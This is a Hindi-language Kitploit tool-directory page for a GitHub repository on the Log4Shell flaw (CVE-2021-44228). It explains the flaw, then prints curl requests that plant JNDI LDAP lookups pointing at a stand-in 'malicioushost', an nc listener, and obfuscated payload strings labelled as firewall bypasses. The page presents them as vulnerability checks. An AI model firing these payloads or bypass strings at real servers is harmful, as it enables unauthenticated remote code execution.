Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-CVE-2021-44228 — CVE-2021-44228 | Kitploit
उपकरण/GitHubGitHub/sud0x00/log4j-cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासरिमोट एक्सेस टूल
GitHubsud0x00/log4j-cve-2021-44228

log4j-CVE-2021-44228

CVE-2021-44228

रिपॉजिटरी देखें
5114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4j-CVE-2021-44228

5 दिसंबर, 2021 को, Apache ने अपनी व्यापक रूप से उपयोग की जाने वाली Log4j लॉगिंग सेवा में एक कमजोरी की पहचान की (जिसे बाद में CVE-2021-44228 के रूप में पहचाना गया)। यह कमजोरी, जिसे Log4shell के नाम से भी जाना जाता है, हमलावरों को प्रभावित सर्वरों का पूर्ण नियंत्रण प्राप्त करने में सक्षम बनाती है, यदि उपयोगकर्ता Java लॉगिंग लाइब्रेरी का उपयोग करने वाले किसी एप्लिकेशन को चला रहा है, तो यह बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन की अनुमति देती है। Log4j डेवऑप्स फ्रेमवर्क, एंटरप्राइज IT सिस्टम, और विक्रेता सॉफ्टवेयर और क्लाउड उत्पादों के व्यापक सेट में भारी रूप से एकीकृत है।

यह जांचने के लिए कि आपका सर्वर Log4j शोषण के प्रति संवेदनशील है या नहीं, दुर्भावनापूर्ण दूरस्थ होस्ट में निम्नलिखित निष्पादित करें:

curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'

nc -lnvp mport

अन्य विविधताएँ जिनमें HTTP-POST अनुरोध शामिल है, का उपयोग कमजोरी की जाँच के लिए किया जा सकता है:

curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port

वेबएप फायरवॉल को बायपास करने के लिए:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
टूल डाउनलोड करें